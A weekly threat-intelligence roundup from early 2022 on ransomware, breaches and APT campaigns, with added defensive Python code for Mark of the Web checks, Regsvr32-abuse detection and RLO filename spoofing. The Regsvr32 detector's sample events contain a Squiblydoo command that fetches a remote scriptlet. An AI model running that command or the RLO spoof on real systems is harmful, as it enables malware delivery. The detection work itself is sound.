Cyware Weekly Threat Intelligence, February 07–11, 2022

The Good

It rained ransomware decryptors this week. A former operator and self-proclaimed developer for Maze, Egregor, and Sekhmet released decryptors for the victims, claiming that this was a planned course of action and had nothing to do with recent takedown efforts by law enforcement. Russia took down three prolific online shops for stolen payment card data and said that similar domains would be targeted in the near future.

  • Decryptors for three infamous ransomware families (Maze, Egregor, and Sekhmet) have been released by a former operator posting as 'Topleak.' Emsisoft has since published a free decryptor for the same three families.
  • Avast has released a free decryption utility for files encrypted by TargetCompany ransomware. The tool recovers the password needed to decrypt the files by brute force, so the process can take considerable time.
  • Following a year of increasingly sophisticated attacks on critical infrastructure in 2021, cybersecurity agencies from Australia, the U.K., and the U.S. released a joint advisory describing the observed trends and attacker behaviors, along with recommended mitigations.
  • The crackdown on cybercrime in Russia continues, with authorities seizing three carding marketplaces: Ferum Shop, Sky-Fraud, and Trump's Dumps. Six people alleged to be members of a group trading stolen payment card data were also detained.
  • The U.S. Department of Justice seized more than $3.6 billion in cryptocurrency linked to the 2016 hack of the Bitfinex exchange, in which some 119,754 bitcoin (worth roughly $4.5 billion at the time of the seizure) were stolen. A Manhattan couple has been arrested and charged with conspiring to launder the proceeds.
  • Starting in April, Microsoft will block VBA macros by default in Office files obtained from the internet. Windows tags such files with a Mark of the Web (MOTW) attribute recording that they came from an untrusted zone, and Office will use that mark to block macros outright instead of offering the usual 'Enable content' button. The change rolls out first in the current version of Office and will later reach Office LTSC and Office 2013, 2016, 2019, and 2021.
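
The macro-blocking item above hinges on the Mark of the Web, so here is what that mark actually looks like on disk and how Office's new default reads it. This is an added example, not code from the Cyware post or from Microsoft; the stream bodies are constructed samples in the format Windows writes, and the URLs in them are invented.

```python
# Added example, not code from the Cyware post or from Microsoft: inspect the
# Mark of the Web that Office's new default consults before deciding whether to
# block macros. On NTFS the mark is an alternate data stream named
# Zone.Identifier attached to the downloaded file; its ZoneId field records the
# URL security zone the file came from. Office blocks VBA macros by default for
# files marked as coming from the Internet (3) or Restricted Sites (4) zones.
# The stream bodies below are constructed samples in the format Windows writes;
# the URLs in them are invented.
from dataclasses import dataclass
from typing import Dict, Optional

ZONE_NAMES = {
    0: "Local Machine",
    1: "Local Intranet",
    2: "Trusted Sites",
    3: "Internet",
    4: "Restricted Sites",
}
MACRO_BLOCKING_ZONES = {3, 4}


@dataclass
class MarkOfTheWeb:
    zone_id: int
    referrer_url: Optional[str] = None
    host_url: Optional[str] = None


def parse_zone_identifier(stream_text: str) -> Optional[MarkOfTheWeb]:
    """Parse the INI-style body of a Zone.Identifier stream.

    Returns None when there is no [ZoneTransfer] section with a numeric ZoneId,
    which is the same as the file carrying no mark at all.
    """
    fields: Dict[str, str] = {}
    in_section = False
    for raw in stream_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line.lower() == "[zonetransfer]"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip().lower()] = value.strip()
    zone = fields.get("zoneid")
    if zone is None or not zone.isdigit():
        return None
    return MarkOfTheWeb(int(zone), fields.get("referrerurl"), fields.get("hosturl"))


def macros_blocked_by_default(motw: Optional[MarkOfTheWeb]) -> bool:
    """True when the new Office default blocks macros outright for this file.

    Files with no mark, or marked Local Machine / Intranet / Trusted Sites, fall
    back to the existing Trust Center macro settings.
    """
    return motw is not None and motw.zone_id in MACRO_BLOCKING_ZONES


def read_motw(path: str) -> Optional[MarkOfTheWeb]:
    """Read the mark from a file on an NTFS volume (Windows only).

    Opening 'name:Zone.Identifier' addresses the alternate data stream; the
    OSError branch covers non-Windows hosts and files that carry no mark.
    """
    try:
        with open(path + ":Zone.Identifier", encoding="utf-8", errors="replace") as f:
            return parse_zone_identifier(f.read())
    except OSError:
        return None


# Constructed samples of stream bodies as written by Windows (URLs invented).
INTERNET_DOWNLOAD = (
    "[ZoneTransfer]\r\n"
    "ZoneId=3\r\n"
    "ReferrerUrl=https://example.invalid/\r\n"
    "HostUrl=https://example.invalid/invoice.docm\r\n"
)
INTRANET_SHARE = "[ZoneTransfer]\r\nZoneId=1\r\n"


if __name__ == "__main__":
    for label, body in (("internet download", INTERNET_DOWNLOAD), ("intranet share", INTRANET_SHARE)):
        mark = parse_zone_identifier(body)
        print(f"{label}: zone={ZONE_NAMES[mark.zone_id]} from={mark.host_url} "
              f"macros blocked={macros_blocked_by_default(mark)}")
```

The mark is metadata, not content: a file extracted from a container that does not carry the mark through, or one whose stream has been removed (PowerShell's Unblock-File does exactly that), arrives with no ZoneId and is not blocked. Detection should therefore not rely on the mark alone; the HostUrl field, when present, is also useful for tracing where a document came from.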

The Bad

Once again, a government agency was the target of a major cyberattack. Unidentified adversaries breached the U.K. Foreign Office in what is suspected to be a cyberespionage campaign. In a new revelation, the BlackCat ransomware group claimed to be former members of the now-defunct DarkSide gang. The elephant in the room, however, is an APT group that remained hidden for a decade. Named ModifiedElephant, researchers have finally shed light on its operations.

  • More than 500 online stores running the end-of-life Magento 1 platform were compromised in a large-scale digital skimming attack. Researchers found 19 distinct backdoors on the compromised systems. The stores were breached through a known vulnerability in the Quickview plugin.
  • Regsvr32, a signed Windows living-off-the-land binary (LOLBin) normally used to register COM DLLs, is being abused to execute attacker-controlled DLLs and scriptlets that deliver trojans such as Lokibot and Qbot. Because the loader is a trusted Microsoft binary, the technique can slip past application allowlisting during the execution phase of the attack.
  • The U.K. Foreign Office was the target of a serious cybersecurity incident. According to media reports, attackers gained access to Foreign, Commonwealth and Development Office (FCDO) systems. Few details about the attack have been made public; BAE Systems Applied Intelligence was brought in for urgent remediation work.
  • Threat actors are using fake Windows 11 upgrade installers to trick users into downloading the RedLine stealer. The malware harvests passwords, browser cookies, payment card details, and cryptocurrency wallet data. According to researchers, the campaign distributes the installer from the look-alike domain 'windows-upgraded.com'.
  • Data of over 6,000 Puma employees was stolen in the December 2021 ransomware attack on HR management provider Ultimate Kronos Group (UKG). Kronos confirmed the theft on January 7, stating in its notification that the attackers had accessed its cloud-based environment before deploying the ransomware.
  • A cross-chain bridge used by the Meter and Moonriver networks was exploited for $4.4 million in ETH and BTC. The attackers abused a flaw in how the bridge automatically wrapped and unwrapped native gas tokens to drain the funds.
  • The BlackCat ransomware gang has confirmed that its members were formerly part of the BlackMatter/DarkSide operation. First seen in November 2021, the ransomware is written in Rust and supports multiple encryption modes, letting it target a wide range of corporate environments.
  • CyberNews researchers uncovered five clones of The Pirate Bay set up by scammers to serve malicious ads. The malvertising campaigns were reaching more than 7 million users per month.
  • Memorial Hermann Health System is notifying patients about a cyberattack that exposed their PHI. The incident affected 6,260 patients; the exposed information includes first and last names, dates of birth, driver's license numbers, and health insurance information.
  • A cyberattack disrupted the operations of Pop TV, Slovenia's most popular TV channel. The attack took place on February 09 and left employees unable to add new content to the platform.
  • Data on the Ohlone Community College District network in Fremont, California, was compromised in a sophisticated cyberattack. The exposed data includes Social Security numbers, dates of birth, driver's license numbers, medical information, and bank account details.
  • Data stolen from accounting group Optionis Group by the Vice Society ransomware gang has surfaced on the dark web. Reports suggest the exposed data includes management-account spreadsheets, contractor timesheets, and correspondence with HM Revenue and Customs.
  • Detailing the tactics of the ModifiedElephant APT, researchers revealed that for over a decade the group has relied on spear-phishing emails with malicious attachments to run cyberespionage campaigns. On multiple occasions the attached documents carried exploits for CVE-2012-0158, CVE-2013-3906, CVE-2014-1761, and CVE-2015-1641. The emails delivered keyloggers, remote access trojans such as NetWire and DarkComet, and even Android malware.
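
The Regsvr32 item in the list above describes a tactic rather than a single indicator, so here is what a detection for it looks like when run over process-creation telemetry. This is an added example, not code from the Cyware post or from the research it cites; the records it scans are constructed, with invented hosts and paths, and the field names simply mirror Sysmon Event ID 1.

```python
# Added example, not code from the Cyware post or from the research it cites: a
# small detection pass over process-creation records for the Regsvr32 abuse
# described above. The field names (Image, CommandLine, ParentImage) mirror
# Sysmon Event ID 1, but every record below is constructed; the hosts and paths
# are invented.
import re
from typing import Dict, List

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
NORMAL_MODULE_EXT = (".dll", ".ocx", ".ax")
# Directories an unprivileged user (or a dropper running as one) can write to.
USER_WRITABLE = re.compile(
    r"\\(Users\\[^\\]+\\(AppData|Downloads|Desktop|Documents)|Windows\\Temp|ProgramData)\\",
    re.IGNORECASE,
)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _split_args(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace, keeping quoted spans intact."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def regsvr32_findings(event: Dict[str, str]) -> List[str]:
    """Return the suspicious traits of one process-creation event (empty if none)."""
    if _basename(event.get("Image", "")) != "regsvr32.exe":
        return []
    findings: List[str] = []
    for arg in _split_args(event.get("CommandLine", ""))[1:]:
        low = arg.lower()
        if low[:3] in ("/i:", "-i:"):
            # /i:<value> is handed to the module's DllInstall; the 'Squiblydoo'
            # trick feeds a URL or UNC path to scrobj.dll, which fetches and
            # runs a COM scriptlet from it.
            target = low[3:]
            if re.match(r"(https?|ftp)://", target) or target.startswith("\\\\") or target.endswith(".sct"):
                findings.append(f"scriptlet argument: {arg}")
        elif low.startswith(("/", "-")):
            continue  # /s /n /u and friends carry no payload
        else:
            if _basename(low) == "scrobj.dll":
                findings.append("scrobj.dll loaded (COM scriptlet host)")
            if not low.endswith(NORMAL_MODULE_EXT):
                findings.append(f"module without a DLL-style extension: {arg}")
            if USER_WRITABLE.search(arg):
                findings.append(f"module in user-writable path: {arg}")
    if _basename(event.get("ParentImage", "")) in OFFICE_PARENTS:
        findings.append("spawned by an Office application")
    return findings


# Constructed events, not real telemetry.
EVENTS = [
    {   # Squiblydoo-style remote scriptlet, launched from a Word document
        "Image": r"C:\Windows\System32\regsvr32.exe",
        "CommandLine": r"regsvr32.exe /s /n /u /i:http://203.0.113.10/a.sct scrobj.dll",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    },
    {   # DLL staged under the user's Temp directory with a decoy extension
        "Image": r"C:\Windows\SysWOW64\regsvr32.exe",
        "CommandLine": r'regsvr32.exe -s "C:\Users\alice\AppData\Local\Temp\report.jpg"',
        "ParentImage": r"C:\Windows\System32\wscript.exe",
    },
    {   # Ordinary COM registration by an installer
        "Image": r"C:\Windows\System32\regsvr32.exe",
        "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\comlib.dll"',
        "ParentImage": r"C:\Windows\System32\msiexec.exe",
    },
]


def triage(events: List[Dict[str, str]]) -> List[List[str]]:
    """Findings per event, in input order."""
    return [regsvr32_findings(e) for e in events]


if __name__ == "__main__":
    for event, found in zip(EVENTS, triage(EVENTS)):
        print(event["CommandLine"])
        for f in found:
            print("   !", f)
```

Match on the binary's OriginalFileName (REGSVR32.EXE) where your telemetry records it, since a renamed copy defeats the Image check above. Installers register COM components with regsvr32 all day, so the parent process and the module's location are what separate a Qbot-style loader from the noise, not the presence of regsvr32 itself.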

New Threats

Coming to other new developments in the threat landscape this week, Medusa and Flubot have joined hands and their infection rates are rising sharply. The Out to Sea campaign, conducted by the OilRig APT, has been running for years and shows no sign of drowning, as a new backdoor, Marlin, has been added to it. Molerats has been slithering around with a new campaign and a previously undocumented implant, NimbleMamba, which has already sunk its fangs into Middle Eastern entities.

  • A new variant of the FritzFrog botnet, with features such as routing through a Tor proxy chain, has made 24,000 attack attempts within a month. Targets include organizations in the healthcare, education, and government sectors. Researchers say the operators are adding capabilities to target WordPress servers.
  • A new wave of attacks from the Kimsuky group delivers a custom backdoor dubbed Gold Dragon. Gold Dragon is a second-stage backdoor that establishes persistence on the victim's system and is used to install the xRAT tool, with which the attackers manually steal sensitive data from the targeted system.
  • A new backdoor dubbed Marlin has been tied to Out to Sea, a long-running espionage campaign that began in April 2018. The malware is a new addition to the arsenal of the OilRig (aka APT34) threat group. Victims include diplomatic organizations, technology companies, and medical organizations in Israel, Tunisia, and the United Arab Emirates.
  • The threat actor tracked as Molerats has been linked to a new campaign using a previously undocumented implant named NimbleMamba. The campaign has targeted Middle Eastern governments, foreign policy think tanks, a state-affiliated airline, and a security firm. The malware is believed to be an upgraded version of the SharpStage backdoor.
  • Researchers have detected new activity in the Roaming Mantis campaign, which has been active since 2018. The attackers have modified the Wroba Android trojan to target Android and iPhone users in Germany and France. Designed to steal credentials and distribute malware, the campaign operates through malicious apps and phishing pages.
  • Security analysts at Vade observed phishing emails that abuse the Unicode Right-to-Left Override (RLO) character to disguise a malicious attachment's real file type, luring victims into opening it and ultimately handing over their Office 365 credentials.
  • New attack campaigns targeting Android users with the Flubot and Medusa trojans have been uncovered. Both are distributed through SMS phishing infrastructure that prompts users to install a fake missed-package-delivery app or a bogus Flash Player. Medusa has so far infected 1,500 devices, with targets in Canada, Turkey, and the U.S., while Flubot has evolved to target users across Europe.
  • Siemens released nine advisories addressing 27 new flaws in its SIMATIC products. If exploited, the vulnerabilities could allow attackers to remotely launch DoS attacks against several Siemens PLCs and related products.
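
The RLO lure in the list above works because the displayed filename and the real one differ, which is exactly what a mail gateway or upload handler can check for. Below is an added example, not code from the Cyware post or from Vade's research, that flags filenames carrying bidi control characters and reconstructs the name the recipient would have seen; the sample filenames in it are constructed.

```python
# Added example, not code from the Cyware post or from Vade's research: detect
# filenames that use the Unicode Right-to-Left Override (U+202E) to disguise a
# file's real extension, and reconstruct the name the recipient would see.
# The sample filenames at the bottom are constructed.
import unicodedata
from dataclasses import dataclass
from typing import List, Tuple

RLO = "\u202e"   # RIGHT-TO-LEFT OVERRIDE
PDF = "\u202c"   # POP DIRECTIONAL FORMATTING, ends an override
# Explicit bidi formatting characters; none of them belong in a filename.
BIDI_CONTROLS = frozenset(
    "\u202a\u202b\u202c\u202d\u202e"   # LRE, RLE, PDF, LRO, RLO
    "\u2066\u2067\u2068\u2069"         # LRI, RLI, FSI, PDI
    "\u200e\u200f"                     # LRM, RLM
)


def find_bidi_controls(name: str) -> List[Tuple[int, str]]:
    """Positions and Unicode names of every bidi control in the filename."""
    return [(i, unicodedata.name(ch)) for i, ch in enumerate(name) if ch in BIDI_CONTROLS]


def apparent_name(name: str) -> str:
    """Approximate the rendered filename.

    Under an RLO, every character up to the next PDF (or the end of the string)
    is forced right-to-left, so that span is drawn reversed. Real renderers also
    mirror brackets and apply the full bidi algorithm; for the ASCII names used
    in these lures a plain reversal of the override span is what the user sees.
    """
    out: List[str] = []
    i = 0
    while i < len(name):
        ch = name[i]
        if ch == RLO:
            end = name.find(PDF, i + 1)
            if end == -1:
                end = len(name)
            out.append(name[i + 1:end][::-1])
            i = end + 1
        elif ch in BIDI_CONTROLS:
            i += 1  # other controls are invisible; drop them
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def _extension(name: str) -> str:
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


@dataclass
class Verdict:
    name: str
    shown_as: str
    real_ext: str       # what the OS will actually treat the file as
    apparent_ext: str   # what the recipient reads off the displayed name
    controls: List[Tuple[int, str]]

    @property
    def suspicious(self) -> bool:
        # A bidi control is itself abnormal; a mismatch between the real and the
        # displayed extension is the RLO spoof proper.
        return bool(self.controls) and self.real_ext != self.apparent_ext


def assess(name: str) -> Verdict:
    stripped = "".join(ch for ch in name if ch not in BIDI_CONTROLS)
    shown = apparent_name(name)
    return Verdict(name, shown, _extension(stripped), _extension(shown), find_bidi_controls(name))


# Constructed samples: an RLO lure whose .scr payload reads as a .doc, and two
# benign names (one carrying a stray RLM that changes nothing visible).
SAMPLES = ["Q1_report\u202ecod.scr", "Invoice.pdf", "\u200fnotes.txt"]

if __name__ == "__main__":
    for sample in SAMPLES:
        v = assess(sample)
        print(f"{v.shown_as!r}: real .{v.real_ext} shown .{v.apparent_ext} "
              f"controls={[n for _, n in v.controls]} suspicious={v.suspicious}")
```

Gateways and upload handlers are better off rejecting or rewriting any name that contains one of these controls than trying to render it faithfully, and file-type decisions belong on content (magic bytes) and on the extension of the control-stripped name, never on what the UI happens to display.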


Posted on: February 11, 2022
